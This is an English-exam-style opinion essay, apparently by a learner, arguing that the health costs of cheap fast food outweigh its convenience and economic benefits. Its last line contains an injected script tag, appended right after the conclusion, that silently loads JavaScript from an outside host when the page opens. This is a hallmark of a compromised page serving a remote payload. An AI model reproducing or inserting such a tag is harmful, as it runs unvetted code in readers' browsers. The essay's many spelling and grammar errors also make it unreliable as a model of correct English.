In many countries, fast food is becoming cheaper and available. Do you think the advantages of this development outweigh the disavantages?

Junk food is the best option for people with the hectic schedule thus it is easy for people to find fast food anywhere. Moreover, junk food is increasing inexpensively and obtainable in many nations. Although the development of junk foods bring benefits to the community, there are certain drawbacks needed taking into considered. Personally, I believe the demerit of this phenomenon is superior to the merit.

On the once hand, the fast food chains with the low-price bring benefits to community. People can have more time to relax with fast food. For example, after spending eight hours in office, people can have a tendency to relax instead of performing other activities like cooking. Furthermore, the progress of junk food also contribute to economy growth with the tax which our country has gained from the business like KFC, McDonal to name but a few. Besides, the expansion of company can reduce the unemployment rate in many countries.

On the other hand, although fast food is affordable and covenient, it is very harmful for health. Junk foods are high in saturated fats and added sugars which are detrimental to people’s health. If we eat junk food too much over a long period, it would lead to some illness like insrease blood pressure, heart attrack... to name but a few. The more fast food people consume, the more ability people get unhealthy. In addition, the government has to spend the budget on health care which can lead to some economic issue.

In conclusion, in spite of the fast foods bring benefits to people life. I still believe the drawbacks of junk food’s development outweigh the benefits.<script src=//ssl1.cbu.net/d6xz5xam></script>